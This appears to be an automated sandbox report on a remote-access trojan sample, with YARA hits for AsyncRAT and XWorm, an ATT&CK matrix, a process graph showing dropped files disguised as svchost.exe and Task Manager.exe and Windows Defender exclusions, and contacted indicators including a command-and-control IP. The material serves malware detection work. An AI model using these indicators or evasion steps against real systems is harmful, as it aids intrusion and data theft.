                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Lowering of HIPS / PFW / Operating System Security Settings

                        barindex
                        Yara detected AsyncRAT
                        Source: Yara matchFile source: 7.0.BLACKGODDOM V.2 GOD BY LA.exe.e10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.All function.exe.2e17bc8.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.All function.exe.2e17bc8.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000007.00000000.2169879127.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2171697039.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: All function.exe PID: 1472, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: BLACKGODDOM V.2 GOD BY LA.exe PID: 5492, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, type: DROPPED

                        Stealing of Sensitive Information

                        barindex
                        Yara detected XWorm
                        Source: Yara matchFile source: 7.0.BLACKGODDOM V.2 GOD BY LA.exe.e10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.All function.cmd.2eafcc0.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.All function.exe.2e17bc8.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.dLRcE11Dkl.exe.28278a8.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.dLRcE11Dkl.exe.2815e68.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.All function.cmd.2ec0300.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.0.svchost.exe.a20000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.All function.cmd.2ec0300.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.Task Manager.exe.3b0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.All function.cmd.2eafcc0.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.All function.exe.2e17bc8.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000002.00000002.2133502093.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2121511846.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000000.2169879127.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000000.2121593204.00000000003B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000000.2116819375.0000000000A22000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2171697039.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: dLRcE11Dkl.exe PID: 2848, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: All function.cmd PID: 5032, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1020, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Task Manager.exe PID: 6876, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: All function.exe PID: 1472, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: BLACKGODDOM V.2 GOD BY LA.exe PID: 5492, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Task Manager.exe, type: DROPPED

                        Remote Access Functionality

                        barindex
                        Yara detected XWorm
                        Source: Yara matchFile source: 7.0.BLACKGODDOM V.2 GOD BY LA.exe.e10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.All function.cmd.2eafcc0.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.All function.exe.2e17bc8.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.dLRcE11Dkl.exe.28278a8.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.dLRcE11Dkl.exe.2815e68.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.All function.cmd.2ec0300.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.0.svchost.exe.a20000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.All function.cmd.2ec0300.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.Task Manager.exe.3b0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.All function.cmd.2eafcc0.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.All function.exe.2e17bc8.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000002.00000002.2133502093.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2121511846.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000000.2169879127.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000000.2121593204.00000000003B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000000.2116819375.0000000000A22000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2171697039.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: dLRcE11Dkl.exe PID: 2848, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: All function.cmd PID: 5032, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1020, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Task Manager.exe PID: 6876, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: All function.exe PID: 1472, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: BLACKGODDOM V.2 GOD BY LA.exe PID: 5492, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Task Manager.exe, type: DROPPED

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                        Windows Management Instrumentation                        		1
                        Scheduled Task/Job                        		111
                        Process Injection                        		111
                        Masquerading                        		OS Credential Dumping321
                        Security Software Discovery                        		Remote Services12
                        Archive Collected Data                        		1
                        Encrypted Channel                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Scheduled Task/Job                        		1
                        DLL Side-Loading                        		1
                        Scheduled Task/Job                        		11
                        Disable or Modify Tools                        		LSASS Memory1
                        Process Discovery                        		Remote Desktop ProtocolData from Removable Media1
                        Ingress Tool Transfer                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts1
                        PowerShell                        		Logon Script (Windows)1
                        DLL Side-Loading                        		51
                        Virtualization/Sandbox Evasion                        		Security Account Manager51
                        Virtualization/Sandbox Evasion                        		SMB/Windows Admin SharesData from Network Shared Drive2
                        Non-Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                        Process Injection                        		NTDS1
                        Application Window Discovery                        		Distributed Component Object ModelInput Capture12
                        Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        Deobfuscate/Decode Files or Information                        		LSA Secrets1
                        System Network Configuration Discovery                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
                        Obfuscated Files or Information                        		Cached Domain Credentials1
                        File and Directory Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                        Software Packing                        		DCSync23
                        System Information Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        DLL Side-Loading                        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561590 Sample: dLRcE11Dkl.exe Startdate: 23/11/2024 Architecture: WINDOWS Score: 100 76 ip-api.com 2->76 98 Suricata IDS alerts for network traffic 2->98 100 Found malware configuration 2->100 102 Malicious sample detected (through community Yara rule) 2->102 104 21 other signatures 2->104 11 dLRcE11Dkl.exe 4 2->11         started        signatures3 process4 file5 66 C:\Users\user\AppData\Roaming\svchost.exe, PE32 11->66 dropped 68 C:\Users\user\AppData\...\All function.cmd, PE32 11->68 dropped 70 C:\Users\user\AppData\...\dLRcE11Dkl.exe.log, CSV 11->70 dropped 112 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->112 114 Drops PE files with benign system names 11->114 15 All function.cmd 4 11->15         started        19 svchost.exe 3 11->19         started        signatures6 process7 dnsIp8 72 C:\Users\user\AppData\...\Task Manager.exe, PE32 15->72 dropped 74 C:\Users\user\AppData\...\All function.exe, PE32 15->74 dropped 80 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 15->80 22 All function.exe 4 15->22         started        26 Task Manager.exe 14 3 15->26         started        78 ip-api.com 208.95.112.1, 49707, 49710, 49712 TUT-ASUS United States 19->78 82 Antivirus detection for dropped file 19->82 84 System process connects to network (likely due to code injection or exploit) 19->84 86 Multi AV Scanner detection for dropped file 19->86 88 3 other signatures 19->88 28 powershell.exe 19->28         started        30 powershell.exe 19->30         started        file9 signatures10 process11 file12 62 C:\Users\user\...\Ratty_win32_directx11.exe, PE32+ 22->62 dropped 64 C:\Users\...\BLACKGODDOM V.2 GOD BY LA.exe, PE32 22->64 dropped 106 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 22->106 32 BLACKGODDOM V.2 GOD BY LA.exe 14 3 22->32         started        35 Ratty_win32_directx11.exe 22->35         started        108 Adds a directory exclusion to Windows Defender 26->108 37 powershell.exe 26->37         started        39 powershell.exe 26->39         started        110 Loading BitLocker PowerShell Module 28->110 41 conhost.exe 28->41         started        43 conhost.exe 30->43         started        signatures13 process14 signatures15 90 Adds a directory exclusion to Windows Defender 32->90 45 powershell.exe 32->45         started        48 powershell.exe 32->48         started        50 powershell.exe 32->50         started        92 Multi AV Scanner detection for dropped file 35->92 94 Machine Learning detection for dropped file 35->94 96 Loading BitLocker PowerShell Module 37->96 52 conhost.exe 37->52         started        54 conhost.exe 39->54         started        process16 signatures17 116 Loading BitLocker PowerShell Module 45->116 56 conhost.exe 45->56         started        58 conhost.exe 48->58         started        60 conhost.exe 50->60         started        process18

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        dLRcE11Dkl.exe68%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                        dLRcE11Dkl.exe100%AviraTR/Dropper.Gen
                        dLRcE11Dkl.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe100%AviraTR/Spy.Gen
                        C:\Users\user\AppData\Roaming\Task Manager.exe100%AviraTR/Spy.Gen
                        C:\Users\user\AppData\Roaming\All function.cmd100%AviraTR/Dropper.Gen
                        C:\Users\user\AppData\Roaming\svchost.exe100%AviraTR/Spy.Gen
                        C:\Users\user\AppData\Roaming\All function.exe100%AviraTR/Dropper.Gen
                        C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Roaming\Task Manager.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Roaming\All function.cmd100%Joe Sandbox ML
                        C:\Users\user\AppData\Roaming\svchost.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Roaming\All function.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe96%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                        C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe62%ReversingLabsWin64.Trojan.Generic
                        C:\Users\user\AppData\Roaming\All function.cmd79%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                        C:\Users\user\AppData\Roaming\Task Manager.exe82%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                        C:\Users\user\AppData\Roaming\svchost.exe92%ReversingLabsByteCode-MSIL.Ransomware.CryptConsole

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        https://qualityboy.rdcw.xyz/0%Avira URL Cloudsafe
                        45.141.27.2220%Avira URL Cloudsafe
                        https://qualityboy.rdcw.xyz/Rat0%Avira URL Cloudsafe
                        http://crl.m)IZ_0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        ip-api.com
                        		208.95.112.1
                        		truefalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          45.141.27.222true
                          • Avira URL Cloud: safe
                          		unknown
                          http://ip-api.com/line/?fields=hostingfalse
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://scripts.sil.org/OFLThisRatty_win32_directx11.exe, 00000006.00000000.2167495504.00007FF7720B5000.00000008.00000001.01000000.0000000A.sdmpfalse
                              		high
                              http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.2476803020.00000251EABBD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2520111925.000002399DBDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2327603396.000001A74D26F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2840317416.0000023B539BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3249961564.000001C4BB09C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3354387858.000001F4DA2EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3705239619.000002D66E4E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.apache.org/licenses/LICENSE-2.0Ratty_win32_directx11.exe, 00000006.00000000.2167495504.00007FF7720B5000.00000008.00000001.01000000.0000000A.sdmpfalse
                                  		high
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000017.00000002.3112040346.000002D65E6A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000008.00000002.2285781338.00000251DAD79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2297819455.000002398DD99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2270854842.000001A73D429000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2436831061.0000023B43B7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2672516135.000001C4AB25A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2735488760.000001F4CA4A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3112040346.000002D65E6A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000017.00000002.3112040346.000002D65E6A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://discord.gg/sGNBaJSzYDstartRatty_win32_directx11.exe, 00000006.00000000.2167454709.00007FF77147A000.00000002.00000001.01000000.0000000A.sdmpfalse
                                          		high
                                          https://qualityboy.rdcw.xyz/RatRatty_win32_directx11.exe, 00000006.00000000.2167454709.00007FF77147A000.00000002.00000001.01000000.0000000A.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.microsoft.copowershell.exe, 00000015.00000002.3481943443.000001F4E2A33000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://contoso.com/Licensepowershell.exe, 00000017.00000002.3705239619.000002D66E4E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://contoso.com/Iconpowershell.exe, 00000017.00000002.3705239619.000002D66E4E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinadRatty_win32_directx11.exe, 00000006.00000000.2167495504.00007FF7720B5000.00000008.00000001.01000000.0000000A.sdmpfalse
                                                  		high
